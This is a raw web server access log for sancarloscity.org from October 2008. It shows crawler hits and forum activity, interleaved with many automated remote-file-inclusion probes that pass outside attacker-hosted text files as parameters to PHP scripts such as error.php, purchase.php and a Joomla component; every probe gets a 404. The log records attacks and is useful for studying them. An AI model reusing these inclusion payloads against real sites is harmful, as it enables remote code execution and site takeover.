89.218.85.18 - - [30/Oct/2008:06:07:46 -0700] "GET /logs/access_081002.log//skin/zero_vote/error.php?dir=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 784 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:07:47 -0700] "GET /skin/zero_vote/error.php?dir=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:47 -0700] "GET /listings/listing/results.php?category_id=713 HTTP/1.1" 200 24396 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:07:47 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 766 "-" "libwww-perl/5.805" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:06:07:48 -0700] "GET /jodera2/posting.php?mode=reply&t=24079 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24079" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:06:07:48 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24079&sid=4f7899fee50c54b8817f21e2b0b439fc HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24079&sid=4f7899fee50c54b8817f21e2b0b439fc" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:49 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:06:07:50 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24079&sid=4f7899fee50c54b8817f21e2b0b439fc" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:06:07:50 -0700] "GET /jodera2/posting.php?mode=reply&t=24079&sid=4f7899fee50c54b8817f21e2b0b439fc HTTP/1.0" 200 50619 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24079&sid=4f7899fee50c54b8817f21e2b0b439fc" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:51 -0700] "GET /listings/listing/results.php?category_id=696 HTTP/1.1" 200 28997 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:53 -0700] "GET /listings/listing/results.php?category_id=699 HTTP/1.1" 200 31242 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:07:58 -0700] "GET /listings/listing/results.php?category_id=716 HTTP/1.1" 200 24409 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:08:08 -0700] "GET /forum2/index.php?showtopic=7&mode=threaded&pid=146 HTTP/1.1" 200 7406 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:06:08:11 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24079&sid=4f7899fee50c54b8817f21e2b0b439fc" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:06:08:12 -0700] "GET /jodera2/viewtopic.php?p=29914 HTTP/1.0" 200 81971 "http://www.sancarloscity.org/viewtopic.php?p=29914#29914" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:08:13 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61701 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:08:21 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 766 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:08:21 -0700] "GET /skin/zero_vote/error.php?dir=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:08:21 -0700] "GET /logs/access_081002.log//skin/zero_vote/error.php?dir=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 784 "-" "libwww-perl/5.805" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:08:22 -0700] "GET /forum2/index.php?showtopic=6&mode=threaded&pid=135 HTTP/1.1" 200 7406 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:08:22 -0700] "GET /jodera2/viewforum.php?f=1&sid=37be5c06c7d80e0e640bdcf0eef269e4 HTTP/1.0" 200 84812 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:08:29 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "www.sancarloscity.org"
72.30.142.88 - - [30/Oct/2008:06:08:30 -0700] "GET /listings/listing/review.php?listing_id=14816 HTTP/1.0" 200 21431 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:08:31 -0700] "GET /listings/listing/results.php?category_id=735 HTTP/1.1" 200 31133 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:08:34 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "www.sancarloscity.org"
123.214.171.33 - - [30/Oct/2008:06:08:35 -0700] "GET /logs/access_081015.log/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 769 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:08:35 -0700] "GET /jodera2/index.php?sid=37be5c06c7d80e0e640bdcf0eef269e4 HTTP/1.0" 200 55145 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "www.sancarloscity.org"
123.214.171.33 - - [30/Oct/2008:06:08:36 -0700] "GET /logs/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 764 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sancarloscity.org"
123.214.171.33 - - [30/Oct/2008:06:08:36 -0700] "GET /errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 759 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:08:37 -0700] "GET /logs/access_081002.log//skin/zero_vote/error.php?dir=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 784 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:08:37 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 766 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:08:37 -0700] "GET /skin/zero_vote/error.php?dir=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:08:38 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:09:02 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:09:03 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61809 "-" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:09:32 -0700] "GET /listings/listing/results.php?category_id=757 HTTP/1.1" 200 24157 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:09:36 -0700] "GET /listings/listing/results.php?category_id=758 HTTP/1.1" 200 24171 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:09:37 -0700] "GET /robots.txt HTTP/1.1" 200 44 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:09:43 -0700] "GET /jodera2/viewforum.php?f=1&sid=f0abd61ae87cb6dc807f9c1240f9c9ad HTTP/1.0" 200 65536 "-" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:09:44 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:09:46 -0700] "GET /logs/access_081015.log//skin/zero_vote/error.php?dir=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 784 "-" "libwww-perl/5.805" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:09:50 -0700] "GET /jodera2/viewforum.php?f=1&sid=f0abd61ae87cb6dc807f9c1240f9c9ad HTTP/1.0" 200 65536 "-" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:09:54 -0700] "GET /jodera2/viewforum.php?f=2&sid=f0abd61ae87cb6dc807f9c1240f9c9ad HTTP/1.0" 200 82753 "-" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.sancarloscity.org"
80.67.23.90 - - [30/Oct/2008:06:09:56 -0700] "GET /logs/access_081003.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 798 "-" "libwww-perl/5.808" "www.sancarloscity.org"
80.67.23.90 - - [30/Oct/2008:06:09:57 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 774 "-" "libwww-perl/5.808" "www.sancarloscity.org"
80.67.23.90 - - [30/Oct/2008:06:09:57 -0700] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 780 "-" "libwww-perl/5.808" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:10:04 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:10:09 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:10:09 -0700] "GET /logs/access_081015.log//skin/zero_vote/error.php?dir=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 784 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:10:16 -0700] "GET /logs/access_081015.log//skin/zero_vote/error.php?dir=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 784 "-" "libwww-perl/5.805" "www.sancarloscity.org"
203.146.26.91 - - [30/Oct/2008:06:10:16 -0700] "GET /phphtml.php?htmlclass_path=http://610times.com/bbs/info/id.txt?? HTTP/1.1" 404 760 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:10:20 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:10:24 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 - "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:10:32 -0700] "GET /jodera2/posting.php?mode=newtopic&f=2 HTTP/1.0" 200 41361 "-" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:10:54 -0700] "GET /listings/listing/results.php?category_id=718 HTTP/1.1" 200 28945 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:10:58 -0700] "GET /logs/access_081002.log//skin/zero_vote/error.php?dir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 784 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:10:58 -0700] "GET /skin/zero_vote/error.php?dir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:11:00 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 766 "-" "libwww-perl/5.805" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:11:02 -0700] "GET /jodera2/index.php?sid=f0abd61ae87cb6dc807f9c1240f9c9ad HTTP/1.0" 200 55206 "-" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.sancarloscity.org"
203.146.15.54 - - [30/Oct/2008:06:11:07 -0700] "GET /skin/zero_vote/error.php?dir=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
203.146.15.54 - - [30/Oct/2008:06:11:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 766 "-" "libwww-perl/5.805" "www.sancarloscity.org"
203.146.15.54 - - [30/Oct/2008:06:11:07 -0700] "GET /logs/access_081002.log//skin/zero_vote/error.php?dir=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 784 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:11:13 -0700] "GET /listings/listing/results.php?category_id=709 HTTP/1.1" 200 26705 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
67.195.37.186 - - [30/Oct/2008:06:11:16 -0700] "GET /listings/listing/results.php?letter=w&category_id=720 HTTP/1.0" 200 25075 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
203.146.15.54 - - [30/Oct/2008:06:11:19 -0700] "GET /logs/access_081015.log//skin/zero_vote/error.php?dir=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 784 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:11:26 -0700] "GET /listings/listing/results.php?category_id=714 HTTP/1.1" 200 24415 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:11:27 -0700] "GET /listings/listing/results.php?category_id=711 HTTP/1.1" 200 31209 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
80.67.23.90 - - [30/Oct/2008:06:11:31 -0700] "GET /logs/access_081009.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 798 "-" "libwww-perl/5.808" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:11:46 -0700] "GET /listings/listing/results.php?category_id=705 HTTP/1.1" 200 24477 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:11:52 -0700] "GET /forum2/index.php?s=347d6731118107304410a5ba7bcf414a&act=idx HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:11:54 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:11:56 -0700] "GET /listings/listing/results.php?category_id=721 HTTP/1.1" 200 24446 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:11:57 -0700] "GET /forum2/index.php?s=349b3cd814213e390fd803dca94a494c&automodule=blog&blogid=5&showentry=0 HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
72.29.83.65 - - [30/Oct/2008:06:12:01 -0700] "GET /logs/access_081015.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.810" "www.sancarloscity.org"
72.29.83.65 - - [30/Oct/2008:06:12:01 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 758 "-" "libwww-perl/5.810" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:12:03 -0700] "GET /forum2/index.php?s=34abad88856b0cb775ca5feab2514671&automodule=blog&blogid=4 HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:12:05 -0700] "GET /listings/listing/results.php?category_id=708 HTTP/1.1" 200 24431 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:12:06 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11442 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=2" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:12:08 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f& HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:12:08 -0700] "GET /listings/listing/results.php?category_id=733 HTTP/1.1" 200 47168 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.29.83.65 - - [30/Oct/2008:06:12:11 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 764 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:12:11 -0700] "GET /listings/listing/results.php?category_id=713 HTTP/1.1" 200 24396 "http://www.sancarloscity.org/listings/listing/results.php?letter=e&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:12:12 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Forward&f=9&t=147 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:12:16 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Help HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
203.146.15.54 - - [30/Oct/2008:06:12:17 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 766 "-" "libwww-perl/5.805" "www.sancarloscity.org"
203.146.15.54 - - [30/Oct/2008:06:12:17 -0700] "GET /logs/access_081002.log//skin/zero_vote/error.php?dir=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 784 "-" "libwww-perl/5.805" "www.sancarloscity.org"
203.146.15.54 - - [30/Oct/2008:06:12:17 -0700] "GET /skin/zero_vote/error.php?dir=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
124.105.61.92 - - [30/Oct/2008:06:12:18 -0700] "GET /jodera2/joderaphoto/displayimage.php?album=lastup&cat=0&pos=2 HTTP/1.1" 200 77299 "http://search.yahoo.com/search?p=prom+dresses&ei=UTF-8&rd=adv&meta=vc%3Dph&fr=yfp-t-501&fr2=rs-top&fp_ip=PH&rs=0&pstart=1&b=11" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.sancarloscity.org"
124.105.61.92 - - [30/Oct/2008:06:12:19 -0700] "GET /jodera2/joderaphoto/scripts.js HTTP/1.1" 200 5209 "http://www.sancarloscity.org/jodera2/joderaphoto/displayimage.php?album=lastup&cat=0&pos=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.sancarloscity.org"
124.105.61.92 - - [30/Oct/2008:06:12:19 -0700] "GET /jodera2/joderaphoto/themes/classic/style.css HTTP/1.1" 200 12990 "http://www.sancarloscity.org/jodera2/joderaphoto/displayimage.php?album=lastup&cat=0&pos=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.sancarloscity.org"
124.105.61.92 - - [30/Oct/2008:06:12:20 -0700] "GET /jodera2/joderaphoto/images/thumbnails.gif HTTP/1.1" 200 352 "http://www.sancarloscity.org/jodera2/joderaphoto/displayimage.php?album=lastup&cat=0&pos=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "sancarloscity.org"
124.105.61.92 - - [30/Oct/2008:06:12:20 -0700] "GET /jodera2/joderaphoto/images/slideshow.gif HTTP/1.1" 200 385 "http://www.sancarloscity.org/jodera2/joderaphoto/displayimage.php?album=lastup&cat=0&pos=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:12:20 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Login&CODE=00 HTTP/1.1" 200 9525 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
124.105.61.92 - - [30/Oct/2008:06:12:21 -0700] "GET /jodera2/joderaphoto/images/rating0.gif HTTP/1.1" 200 437 "http://www.sancarloscity.org/jodera2/joderaphoto/displayimage.php?album=lastup&cat=0&pos=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "sancarloscity.org"
124.105.61.92 - - [30/Oct/2008:06:12:21 -0700] "GET /jodera2/joderaphoto/images/smiles/icon_mad.gif HTTP/1.1" 200 174 "http://www.sancarloscity.org/jodera2/joderaphoto/displayimage.php?album=lastup&cat=0&pos=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "sancarloscity.org"
124.105.61.92 - - [30/Oct/2008:06:12:22 -0700] "GET /jodera2/joderaphoto/images/valid-xhtml10.gif HTTP/1.1" 200 463 "http://www.sancarloscity.org/jodera2/joderaphoto/themes/classic/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:06:12:24 -0700] "GET /forum2/index.php?s=3507a257e6f76a1b18a184f00088ab7f&act=Members HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
